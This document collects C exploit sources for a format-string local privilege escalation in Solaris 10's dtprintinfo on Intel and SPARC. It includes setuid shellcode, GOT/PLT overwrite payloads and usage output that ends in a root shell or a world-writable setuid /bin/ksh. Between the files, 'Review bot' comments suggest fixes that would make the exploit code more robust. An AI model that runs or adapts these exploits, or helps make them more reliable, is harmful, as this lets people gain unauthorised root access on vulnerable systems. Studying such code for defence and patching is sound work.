* uid=0(root) gid=1(other)
* #
*
* Tested on:
* SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13)
* [previous Solaris versions are also likely vulnerable]
*/
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/systeminfo.h>
#define INFO1 "raptor_dtprintcheckdir_intel2.c - Solaris/Intel FMT LPE"
#define INFO2 "Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define VULN "/usr/dt/bin/dtprintinfo" // vulnerable program
#define BUFSIZE 300 // size of evil env var
#define STACKPOPSEQ "%.8x" // stackpop sequence
#define STACKPOPS 14 // number of stackpops
/* replace with valid addresses for your system */
#define STRLEN 0x080994cc // .got strlen address
#define SPRINTF 0x080994e4 // .got sprintf address
#define STRDUP 0x0805df20 // .plt strdup address
#define RET 0x08067f52 // call *-0x8(%ebp) address
/* split an address in 4 bytes */
#define SPLITB(b1, b2, b3, b4, addr) { \
b1 = (addr & 0x000000ff); \
b2 = (addr & 0x0000ff00) >> 8; \
b3 = (addr & 0x00ff0000) >> 16; \
b4 = (addr & 0xff000000) >> 24; \
}
char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */
/* double setuid() */
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
/* execve() */
"\x31\xc0\x50\x68/ksh\x68/bin"
"\x89\xe3\x50\x53\x89\xe2\x50"
"\x52\x53\xb0\x3b\x50\xcd\x91";
/* globals */
char *arg[2] = {"foo", NULL};
char *env[256];
int env_pos = 0, env_len = 0;
/* prototypes */
int add_env(char *string);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], *p = buf;
char platform[256], release[256], display[256];
int i, stackpops = STACKPOPS;
unsigned base, n1, n2, n3, n4, n5, n6, n7, n8;
unsigned char strdup1, strdup2, strdup3, strdup4;
unsigned char ret1, ret2, ret3, ret4;
int strlen_got = STRLEN;
int sprintf_got = SPRINTF;
int strdup_plt = STRDUP;
int ret = RET;
/* lpstat code to add a fake printer */
if (!strcmp(argv[0], "lpstat")) {
/* check command line */
if (argc != 2)
exit(1);
/* print the expected output and exit */
if(!strcmp(argv[1], "-v")) {
fprintf(stderr, "lpstat called with -v\n");
printf("device for fnord: /dev/null\n");
} else {
fprintf(stderr, "lpstat called with -d\n");
printf("system default destination: fnord\n");
}
exit(0);
}
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* process command line */
if (argc != 2) {
fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
exit(1);
}
sprintf(display, "DISPLAY=%s", argv[1]);
/* evil env var: name + shellcode + padding */
bzero(buf, BUFSIZE);
sprintf(buf, "REQ_DIR=%s#", sc);
p += strlen(buf);
/* format string: .got strlen address */
*((void **)p) = (void *)(strlen_got); p += 4;
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(strlen_got + 1); p += 4;
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(strlen_got + 2); p += 4;
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(strlen_got + 3); p += 4;
memset(p, 'A', 4); p += 4; /* dummy */
/* format string: .got sprintf address */
*((void **)p) = (void *)(sprintf_got); p += 4;
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(sprintf_got + 1); p += 4;
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(sprintf_got + 2); p += 4;
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(sprintf_got + 3); p += 4;
/* format string: stackpop sequence */
base = strlen(buf) - strlen("REQ_DIR=");
for (i = 0; i < stackpops; i++, p += strlen(STACKPOPSEQ), base += 8)
strcat(p, STACKPOPSEQ);
/* calculate numeric arguments for .plt strdup address */
SPLITB(strdup1, strdup2, strdup3, strdup4, strdup_plt);
n1 = (strdup1 - base) % 0x100;
n2 = (strdup2 - base - n1) % 0x100;
n3 = (strdup3 - base - n1 - n2) % 0x100;
n4 = (strdup4 - base - n1 - n2 - n3) % 0x100;
/* calculate numeric arguments for call *-0x8(%ebp) address */
SPLITB(ret1, ret2, ret3, ret4, ret);
n5 = (ret1 - base - n1 - n2 - n3 - n4) % 0x100;
n6 = (ret2 - base - n1 - n2 - n3 - n4 - n5) % 0x100;
n7 = (ret3 - base - n1 - n2 - n3 - n4 - n5 - n6) % 0x100;
n8 = (ret4 - base - n1 - n2 - n3 - n4 - n5 - n6 - n7) % 0x100;
/* check for potentially dangerous numeric arguments below 10 */
n1 += (n1 < 10) ? (0x100) : (0);
n2 += (n2 < 10) ? (0x100) : (0);
n3 += (n3 < 10) ? (0x100) : (0);
n4 += (n4 < 10) ? (0x100) : (0);
n5 += (n5 < 10) ? (0x100) : (0);
n6 += (n6 < 10) ? (0x100) : (0);
n7 += (n7 < 10) ? (0x100) : (0);
n8 += (n8 < 10) ? (0x100) : (0);
/* format string: write string */
sprintf(p, "%%%dx%%n%%%dx%%n%%%dx%%n%%%dx%%n%%%dx%%n%%%dx%%n%%%dx%%n%%%dx%%n", n1, n2, n3, n4, n5, n6, n7, n8);
/* fill the envp, keeping padding */
add_env(buf);
add_env(display);
add_env("TMP_DIR=/tmp");
add_env("PATH=.:/usr/bin");
add_env("HOME=/tmp");
add_env(NULL);
/* we need at least one directory inside TMP_DIR to trigger the bug */
mkdir("/tmp/one_dir", S_IRWXU | S_IRWXG | S_IRWXO);
/* create a symlink for the fake lpstat */
unlink("lpstat");
symlink(argv[0], "lpstat");
/* print some output */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
fprintf(stderr, "Using SI_PLATFORM\t\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using strlen address in .got\t: 0x%p\n", (void *)strlen_got);
fprintf(stderr, "Using sprintf address in .got\t: 0x%p\n", (void *)sprintf_got);
fprintf(stderr, "Using strdup address in .plt\t: 0x%p\n", (void *)strdup_plt);
fprintf(stderr, "Using call *-0x8(%%ebp) address\t: 0x%p\n\n", (void *)ret);
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
exit(1);
}
/*
* add_env(): add a variable to envp and pad if needed
*/
int add_env(char *string)
{
int i;
/* null termination */
if (!string) {
env[env_pos] = NULL;
return env_len;
}
/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;
/* pad the envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}
return env_len;
}
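Review bot: Nothing in main() checks that the assembled REQ_DIR string fits in buf[BUFSIZE] (300 bytes): the initial sprintf(buf, "REQ_DIR=%s#", sc), the pointer writes through p, the strcat() loop driven by STACKPOPS and the final sprintf(p, ...) all advance into buf without ever comparing p - buf against BUFSIZE, so changing STACKPOPS, the shellcode or the address list can silently overrun the tool's own stack buffer. Suggest computing the required length up front (or asserting p - buf < BUFSIZE before each stage) and using snprintf() with the remaining space for the final write string. Minor: strlen/strcat/strcmp/memset are declared in <string.h>; the file only includes <strings.h>, which happens to pull in <string.h> on Solaris, but -Wall on other toolchains will warn about implicit declarations, so include <string.h> explicitly.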

@ -0,0 +1,549 @@
# Exploit Title: Solaris 10 1/13 (SPARC) - 'dtprintinfo' Local Privilege Escalation
# Date: 2021-02-01
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.oracle.com/solaris/solaris10/
# Version: Solaris 10
# Tested on: Solaris 10 1/13 SPARC
/*
* raptor_dtprintcheckdir_sparc.c - Solaris/SPARC FMT PoC
* Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* "Mimimimimimimi
* Mimimi only mimi
* Mimimimimimimi
* Mimimi sexy mi"
* -- Serebro
*
* As usual, exploitation on SPARC turned out to be much more complicated (and
* fun) than on Intel. Since the vulnerable program needs to survive one
* additional function before we can hijack %pc, the classic stack-based buffer
* overflow approach didn't seem feasible in this case. Therefore, I opted for
* the format string bug. This is just a proof of concept, 'cause guess what --
* on my system it works only when gdb or truss are attached to the target
* process:( To borrow Neel Mehta's words:
*
* "It's quite common to find an exploit that only works with GDB attached to
* the process, simply because without the debugger, break register windows
* aren't flushed to the stack and the overwrite has no effect."
* -- The Shellcoder's Handbook
*
* On different hardware configurations this exploit might work if the correct
* retloc and offset are provided. It might also be possible to force a context
* switch at the right time that results in registers being flushed to the
* stack at the right moment. However, this method tends to be unreliable even
* when the attack is repeatable like in this case. A better way to solve the
* puzzle would be to overwrite something different, e.g.:
*
* - Activation records of other functions, such as check_dir() (same issues)
* - Callback to function SortJobs() (nope, address is hardcoded in .text)
* - PLT in the binary (I need a different technique to handle null bytes)
* - PLT (R_SPARC_JMP_SLOT) in libc (no null bytes, this looks promising!)
* - Other OS function pointers I'm not aware of still present in Solaris 10
*
* Finally, it might be possible to combine the stack-based buffer overflow and
* the format string bug to surgically fix addresses and survive until needed
* for program flow hijacking to be possible. Bottom line: there's still some
* work to do to obtain a reliable exploit, but I think it's feasible. You're
* welcome to try yourself if you feel up to the task and have a spare SPARC
* box;) [spoiler alert: I did it myself, see raptor_dtprintcheckdir_sparc2.c]
*
* This bug was likely fixed during the general cleanup of CDE code done by
* Oracle in response to my recently reported vulnerabilities. However, I can't
* confirm this because I have no access to their patches:/
*
* See also:
* raptor_dtprintcheckdir_intel.c (vulnerability found by Marti Guasch Jimenez)
* raptor_dtprintcheckdir_intel2.c
* raptor_dtprintcheckdir_sparc2.c (the real deal)
*
* Usage:
* $ gcc raptor_dtprintcheckdir_sparc.c -o raptor_dtprintcheckdir_sparc -Wall
* [on your xserver: disable the access control]
* $ truss -u a.out -u '*' -fae ./raptor_dtprintcheckdir_sparc 192.168.1.1:0
* [on your xserver: double click on the fake "fnord" printer]
* ...
* -> __0FJcheck_dirPcTBPPP6QStatusLineStructPii(0xfe584e58, 0xff2a4042, 0x65db0, 0xffbfc50c)
* -> libc:getenv(0x4e8f8, 0x0, 0x0, 0x0)
* <- libc:getenv() = 0xffbff364
* -> libc:getenv(0x4e900, 0x1, 0xf9130, 0x0)
* <- libc:getenv() = 0xffbff364
* -> libc:sprintf(0xffbfc1bc, 0xffbff364, 0xff2a4042, 0x0)
* ...
* setuid(0) = 0
* chmod("/bin/ksh", 037777777777) = 0
* _exit(0)
* $ ksh
* # id
* uid=100(user) gid=1(other) euid=0(root) egid=2(bin)
* #
*
* Tested on:
* SunOS 5.10 Generic_Virtual sun4u sparc SUNW,SPARC-Enterprise
* [previous Solaris versions are also likely vulnerable (and easier to exploit)]
*/
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/systeminfo.h>
#define INFO1 "raptor_dtprintcheckdir_sparc.c - Solaris/SPARC FMT PoC"
#define INFO2 "Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define VULN "/usr/dt/bin/dtprintinfo" // vulnerable program
#define BUFSIZE 3000 // size of evil env var
#define BUFSIZE2 10000 // size of padding buf
#define STACKPOPSEQ "%.8x" // stackpop sequence
#define STACKPOPS 383 // number of stackpops
/* default retloc and offset for sprintf() */
#define RETLOC 0xffbfbb3c // saved ret location
#define OFFSET 84 // offset from retloc to i0loc
/* default retloc and offset for check_dir() */
/* TODO: patch %i6 that gets corrupted by overflow */
//#define RETLOC 0xffbfbbac // default saved ret location
//#define OFFSET 1884 // default offset from retloc to i0loc
/* split an address in 4 bytes */
#define SPLITB(B1, B2, B3, B4, ADDR) { \
B4 = (ADDR & 0x000000ff); \
B3 = (ADDR & 0x0000ff00) >> 8; \
B2 = (ADDR & 0x00ff0000) >> 16; \
B1 = (ADDR & 0xff000000) >> 24; \
}
/* calculate numeric arguments for write string */
#define CALCARGS(N1, N2, N3, N4, B1, B2, B3, B4, BASE) { \
N1 = (B4 - BASE) % 0x100; \
N2 = (B2 - BASE - N1) % 0x100; \
N3 = (B1 - BASE - N1 - N2) % 0x100; \
N4 = (B3 - BASE - N1 - N2 - N3) % 0x100; \
BASE += N1 + N2 + N3 + N4; \
}
//#define USE_EXEC_SC // uncomment to use exec shellcode
#ifdef USE_EXEC_SC
char sc[] = /* Solaris/SPARC execve() shellcode (12 + 48 = 60 bytes) */
/* setuid(0) */
"\x90\x08\x3f\xff" /* and %g0, -1, %o0 */
"\x82\x10\x20\x17" /* mov 0x17, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
/* execve("/bin/ksh", argv, NULL) */
"\x9f\x41\x40\x01" /* rd %pc,%o7 ! >= sparcv8+ */
"\x90\x03\xe0\x28" /* add %o7, 0x28, %o0 */
"\x92\x02\x20\x10" /* add %o0, 0x10, %o1 */
"\xc0\x22\x20\x08" /* clr [ %o0 + 8 ] */
"\xd0\x22\x20\x10" /* st %o0, [ %o0 + 0x10 ] */
"\xc0\x22\x20\x14" /* clr [ %o0 + 0x14 ] */
"\x82\x10\x20\x0b" /* mov 0xb, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\x80\x1c\x40\x11" /* xor %l1, %l1, %g0 ! nop */
"\x41\x41\x41\x41" /* placeholder */
"/bin/ksh";
#else
char sc[] = /* Solaris/SPARC chmod() shellcode (12 + 32 + 20 = 64 bytes) */
/* setuid(0) */
"\x90\x08\x3f\xff" /* and %g0, -1, %o0 */
"\x82\x10\x20\x17" /* mov 0x17, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
/* chmod("/bin/ksh", 037777777777) */
"\x92\x20\x20\x01" /* sub %g0, 1, %o1 */
"\x20\xbf\xff\xff" /* bn,a <sc - 4> */
"\x20\xbf\xff\xff" /* bn,a <sc> */
"\x7f\xff\xff\xff" /* call <sc + 4> */
"\x90\x03\xe0\x20" /* add %o7, 0x20, %o0 */
"\xc0\x22\x20\x08" /* clr [ %o0 + 8 ] */
"\x82\x10\x20\x0f" /* mov 0xf, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
/* exit(0) */
"\x90\x08\x3f\xff" /* and %g0, -1, %o0 */
"\x82\x10\x20\x01" /* mov 1, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh";
#endif /* USE_EXEC_SC */
/* globals */
char *arg[2] = {"foo", NULL};
char *env[256];
int env_pos = 0, env_len = 0;
/* prototypes */
int add_env(char *string);
void check_zero(int addr, char *pattern);
int get_env_addr(char *path, char **argv);
int search_ldso(char *sym);
int search_rwx_mem(void);
void set_val(char *buf, int pos, int val);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], *p = buf, buf2[BUFSIZE2];
char platform[256], release[256], display[256];
int env_addr, sc_addr, retloc = RETLOC, i0loc, i1loc, i7loc;
int offset = OFFSET;
int sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
int ret = search_ldso("sprintf");
int rwx_mem = search_rwx_mem() + 24; /* stable address */
int i, stackpops = STACKPOPS;
unsigned char b1, b2, b3, b4;
unsigned base, n[16]; /* must be unsigned */
/* lpstat code to add a fake printer */
if (!strcmp(argv[0], "lpstat")) {
/* check command line */
if (argc != 2)
exit(1);
/* print the expected output and exit */
if(!strcmp(argv[1], "-v")) {
fprintf(stderr, "lpstat called with -v\n");
printf("device for fnord: /dev/null\n");
} else {
fprintf(stderr, "lpstat called with -d\n");
printf("system default destination: fnord\n");
}
exit(0);
}
/* helper program that prints argv[0] address, used by get_env_addr() */
if (!strcmp(argv[0], "foo")) {
printf("0x%p\n", argv[0]);
exit(0);
}
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* process command line */
if ((argc < 2) || (argc > 4)) {
#ifdef USE_EXEC_SC
fprintf(stderr, "usage: %s xserver:display [retloc] [offset]\n\n", argv[0]);
#else
fprintf(stderr, "usage:\n$ %s xserver:display [retloc] [offset]\n$ /bin/ksh\n\n", argv[0]);
#endif /* USE_EXEC_SC */
exit(1);
}
sprintf(display, "DISPLAY=%s", argv[1]);
if (argc > 2)
retloc = (int)strtoul(argv[2], (char **)NULL, 0);
if (argc > 3)
offset = (int)strtoul(argv[3], (char **)NULL, 0);
/* calculate saved %i0 and %i7 locations based on retloc */
i0loc = retloc + offset;
i1loc = i0loc + 4;
i7loc = i0loc + 28;
/* evil env var: name + shellcode + padding */
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf) - 1] = 0x0;
memcpy(buf, "REQ_DIR=", strlen("REQ_DIR="));
p += strlen("REQ_DIR=");
/* padding buffer to avoid stack overflow */
memset(buf2, 'B', sizeof(buf2));
buf2[sizeof(buf2) - 1] = 0x0;
/* fill the envp, keeping padding */
add_env(buf2);
add_env(buf);
add_env(display);
add_env("TMP_DIR=/tmp");
add_env("PATH=.:/usr/bin");
sc_addr = add_env("HOME=/tmp");
add_env(sc);
add_env(NULL);
/* calculate the needed addresses */
env_addr = get_env_addr(VULN, argv);
sc_addr += env_addr;
#ifdef USE_EXEC_SC
/* populate exec shellcode placeholder */
set_val(sc, 48, sb - 1024);
#endif /* USE_EXEC_SC */
/* format string: saved ret */
*((void **)p) = (void *)(retloc); p += 4; /* 0x000000ff */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(retloc); p += 4; /* 0x00ff0000 */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(retloc); p += 4; /* 0xff000000 */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(retloc + 2); p += 4; /* 0x0000ff00 */
memset(p, 'A', 4); p += 4; /* dummy */
/* format string: saved %i0: 1st arg to sprintf() */
*((void **)p) = (void *)(i0loc); p += 4; /* 0x000000ff */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i0loc); p += 4; /* 0x00ff0000 */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i0loc); p += 4; /* 0xff000000 */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i0loc + 2); p += 4; /* 0x0000ff00 */
memset(p, 'A', 4); p += 4; /* dummy */
/* format string: saved %i7: return address */
*((void **)p) = (void *)(i7loc); p += 4; /* 0x000000ff */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i7loc); p += 4; /* 0x00ff0000 */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i7loc); p += 4; /* 0xff000000 */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i7loc + 2); p += 4; /* 0x0000ff00 */
memset(p, 'A', 4); p += 4; /* dummy */
/* format string: saved %i1: 2nd arg to sprintf() */
*((void **)p) = (void *)(i1loc); p += 4; /* 0x000000ff */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i1loc); p += 4; /* 0x00ff0000 */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i1loc); p += 4; /* 0xff000000 */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i1loc + 2); p += 4; /* 0x0000ff00 */
/* format string: stackpop sequence */
base = p - buf - strlen("REQ_DIR=");
for (i = 0; i < stackpops; i++, p += strlen(STACKPOPSEQ), base += 8)
memcpy(p, STACKPOPSEQ, strlen(STACKPOPSEQ));
/* calculate numeric arguments for retloc */
SPLITB(b1, b2, b3, b4, (ret - 4));
CALCARGS(n[0], n[1], n[2], n[3], b1, b2, b3, b4, base);
/* calculate numeric arguments for i0loc */
SPLITB(b1, b2, b3, b4, rwx_mem);
CALCARGS(n[4], n[5], n[6], n[7], b1, b2, b3, b4, base);
/* calculate numeric arguments for i7loc */
SPLITB(b1, b2, b3, b4, (rwx_mem - 8));
CALCARGS(n[8], n[9], n[10], n[11], b1, b2, b3, b4, base);
/* calculate numeric arguments for i1loc */
SPLITB(b1, b2, b3, b4, sc_addr);
CALCARGS(n[12], n[13], n[14], n[15], b1, b2, b3, b4, base);
/* check for potentially dangerous numeric arguments below 10 */
for (i = 0; i < 16; i++)
n[i] += (n[i] < 10) ? (0x100) : (0);
/* format string: write string */
sprintf(p, "%%.%dx%%n%%.%dx%%hn%%.%dx%%hhn%%.%dx%%hhn%%.%dx%%n%%.%dx%%hn%%.%dx%%hhn%%.%dx%%hhn%%.%dx%%n%%.%dx%%hn%%.%dx%%hhn%%.%dx%%hhn%%.%dx%%n%%.%dx%%hn%%.%dx%%hhn%%.%dx%%hhn", n[0], n[1], n[2], n[3], n[4], n[5], n[6], n[7], n[8], n[9], n[10], n[11], n[12], n[13], n[14], n[15]);
buf[strlen(buf)] = 'A'; /* preserve buf length */
/* we need at least one directory inside TMP_DIR to trigger the bug */
mkdir("/tmp/one_dir", S_IRWXU | S_IRWXG | S_IRWXO);
/* create a symlink for the fake lpstat */
unlink("lpstat");
symlink(argv[0], "lpstat");
/* print some output */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using ret location\t: 0x%p\n", (void *)retloc);
fprintf(stderr, "Using %%i0 location\t: 0x%p\n", (void *)i0loc);
fprintf(stderr, "Using %%i1 location\t: 0x%p\n", (void *)i1loc);
fprintf(stderr, "Using %%i7 location\t: 0x%p\n", (void *)i7loc);
fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
fprintf(stderr, "Using sprintf() address\t: 0x%p\n\n", (void *)ret);
/* check for null bytes (add some padding to env if needed) */
check_zero(retloc, "ret location");
check_zero(i0loc, "%%i0 location");
check_zero(i1loc, "%%i1 location");
check_zero(i7loc, "%%i7 location");
check_zero(rwx_mem, "rwx_mem address");
check_zero(sc_addr, "sc address");
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
exit(1);
}
/*
* add_env(): add a variable to envp and pad if needed
*/
int add_env(char *string)
{
int i;
/* null termination */
if (!string) {
env[env_pos] = NULL;
return env_len;
}
/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;
/* pad the envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}
return env_len;
}
/*
* check_zero(): check an address for the presence of a 0x00
*/
void check_zero(int addr, char *pattern)
{
if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
!(addr & 0xff000000)) {
fprintf(stderr, "error: %s contains a 0x00!\n", pattern);
exit(1);
}
}
/*
* get_env_addr(): get environment address using a helper program
*/
int get_env_addr(char *path, char **argv)
{
char prog[] = "./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
char hex[11] = "\x00";
int fd[2], addr;
/* truncate program name at correct length and create a hard link */
prog[strlen(path)] = 0x0;
unlink(prog);
link(argv[0], prog);
/* open pipe to read program output */
if (pipe(fd) < 0) {
perror("pipe");
exit(1);
}
switch(fork()) {
case -1: /* cannot fork */
perror("fork");
exit(1);
case 0: /* child */
dup2(fd[1], 1);
close(fd[0]);
close(fd[1]);
execve(prog, arg, env);
perror("execve");
exit(1);
default: /* parent */
close(fd[1]);
read(fd[0], hex, sizeof(hex));
break;
}
/* check and return address */
if (!(addr = (int)strtoul(hex, (char **)NULL, 0))) {
fprintf(stderr, "error: cannot read ff address from helper program\n");
exit(1);
}
return addr + 4;
}
/*
* search_ldso(): search for a symbol inside ld.so.1
*/
int search_ldso(char *sym)
{
int addr;
void *handle;
Link_map *lm;
/* open the executable object file */
if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
perror("dlopen");
exit(1);
}
/* get dynamic load information */
if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
perror("dlinfo");
exit(1);
}
/* search for the address of the symbol */
if ((addr = (int)dlsym(handle, sym)) == NULL) {
fprintf(stderr, "error: sorry, function %s() not found\n", sym);
exit(1);
}
/* close the executable object file */
dlclose(handle);
check_zero(addr - 4, sym);
return addr;
}
/*
* search_rwx_mem(): search for an RWX memory segment valid for all
* programs (typically, /usr/lib/ld.so.1) using the proc filesystem
*/
int search_rwx_mem(void)
{
int fd;
char tmp[16];
prmap_t map;
int addr = 0, addr_old;
/* open the proc filesystem */
sprintf(tmp,"/proc/%d/map", (int)getpid());
if ((fd = open(tmp, O_RDONLY)) < 0) {
fprintf(stderr, "error: can't open %s\n", tmp);
exit(1);
}
/* search for the last RWX memory segment before stack (last - 1) */
while (read(fd, &map, sizeof(map)))
if (map.pr_vaddr)
if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
addr_old = addr;
addr = map.pr_vaddr;
}
close(fd);
/* add 4 to the exact address null bytes */
if (!(addr_old & 0xff))
addr_old |= 0x04;
if (!(addr_old & 0xff00))
addr_old |= 0x0400;
return addr_old;
}
/*
* set_val(): copy a dword inside a buffer
*/
void set_val(char *buf, int pos, int val)
{
buf[pos] = (val & 0xff000000) >> 24;
buf[pos + 1] = (val & 0x00ff0000) >> 16;
buf[pos + 2] = (val & 0x0000ff00) >> 8;
buf[pos + 3] = (val & 0x000000ff);
}
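Review bot: In search_rwx_mem(), addr_old is declared without an initializer (int addr = 0, addr_old;) and is only assigned once a second matching mapping is seen, so if /proc/<pid>/map yields fewer than two matching mappings the function returns an indeterminate value that main() then folds into rwx_mem and passes to check_zero(). Initialize it to 0 and fail with a clear error if it is still 0 after the loop. The mapping test is also looser than the comment claims: map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC) is true for any mapping that has at least one of the three flags, not only for read-write-execute segments; if RWX is intended, compare (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) == (MA_READ | MA_WRITE | MA_EXEC). Finally, the loop reads whole prmap_t records with read() without checking for a short read.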

@ -0,0 +1,309 @@
# Exploit Title: Solaris 10 1/13 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)
# Date: 2021-02-01
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.oracle.com/solaris/solaris10/
# Version: Solaris 10
# Tested on: Solaris 10 1/13 SPARC
/*
* raptor_dtprintcheckdir_sparc2.c - Solaris/SPARC FMT LPE
* Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* "You still haven't given up on me?" -- Bruce Wayne
* "Never!" -- Alfred Pennyworth
*
* I would like to thank ~A. for his incredible research work spanning decades,
* an endless source of inspiration for me.
*
* Whoah, this one wasn't easy! This is a pretty lean exploit now, but its
* development took me some time. It's been almost two weeks, and I came
* close to giving up a couple of times. Here's a summary of the main
* roadblocks and complications I ran into while porting my dtprintinfo
* format string exploit to SPARC:
*
* - Half word writes and similar techniques that need to print a large amount
* of chars are problematic, because we have both a format string bug and a
* stack-based buffer overflow, and we risk running out of stack space! We
* might be able to prevent this by increasing the size of the padding buffer,
* (buf2) but your mileage may vary.
*
* - I therefore opted for a more portable single-byte write, but SPARC is a
* RISC architecture and as such it's not happy with memory operations on
* misaligned addresses... So I had to figure out a possibly novel technique
* to prevent the dreaded Bus Error. It involves the %hhn format string, check
* it out!
*
* - Once I had my write-what primitive figured out, I needed to pick a suitable
* memory location to patch... and I almost ran out of options. Function
* activation records turned out to be cumbersome and unreliable (see my PoC
* raptor_dtprintcheckdir_sparc.c), .plt entries in the vulnerable binary
* start with a null byte, and the usual OS function pointers that were
* popular targets 15 years ago are not present in modern Solaris 10 releases
* anymore. Finally, I noticed that the libc also contains .plt jump codes
* that get executed upon function calling. Since they don't start with a null
* byte, I decided to target them.
*
* - Instead of meddling with jump codes, to keep things simpler I decided to
* craft the shellcode directly in the .plt section of libc by exploiting the
* format string bug. This technique proved to be very effective, but
* empirical tests showed that (for unknown reasons) the shellcode size was
* limited to 36 bytes. It looks like there's a limit on the number of args,
* to sprintf(), unrelated to where we write in memory. Who cares, 36 bytes
* are just enough to escalate privileges.
*
* After I plugged a small custom shellcode into my exploit, it worked like a
* charm. Simple, isn't it?;)
*
* To get the libc base, use pmap on the dtprintinfo process, e.g.:
* $ pmap 4190 | grep libc.so.1 | grep r-x
* FE800000 1224K r-x-- /lib/libc.so.1
*
* To grab the offset to strlen in .plt, you can use objdump as follows:
* $ objdump -R /usr/lib/libc.so.1 | grep strlen
* 0014369c R_SPARC_JMP_SLOT strlen
*
* This bug was likely fixed during the general cleanup of CDE code done by
* Oracle in response to my recently reported vulnerabilities. However, I can't
* confirm this because I have no access to their patches:/
*
* See also:
* raptor_dtprintcheckdir_intel.c (vulnerability found by Marti Guasch Jimenez)
* raptor_dtprintcheckdir_intel2.c
* raptor_dtprintcheckdir_sparc.c (just a proof of concept)
*
* Usage:
* $ gcc raptor_dtprintcheckdir_sparc2.c -o raptor_dtprintcheckdir_sparc2 -Wall
* [on your xserver: disable the access control]
* $ ./raptor_dtprintcheckdir_sparc2 10.0.0.104:0
* raptor_dtprintcheckdir_sparc2.c - Solaris/SPARC FMT LPE
* Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Using SI_PLATFORM : SUNW,SPARC-Enterprise (5.10)
* Using libc/.plt/strlen : 0xfe94369c
*
* Don't worry if you get a SIGILL, just run /bin/ksh anyway!
*
* lpstat called with -v
* lpstat called with -v
* lpstat called with -d
* [on your xserver: double click on the fake "fnord" printer]
* Illegal Instruction
* $ ls -l /bin/ksh
* -rwsrwsrwx 3 root bin 209288 Feb 21 2012 /bin/ksh
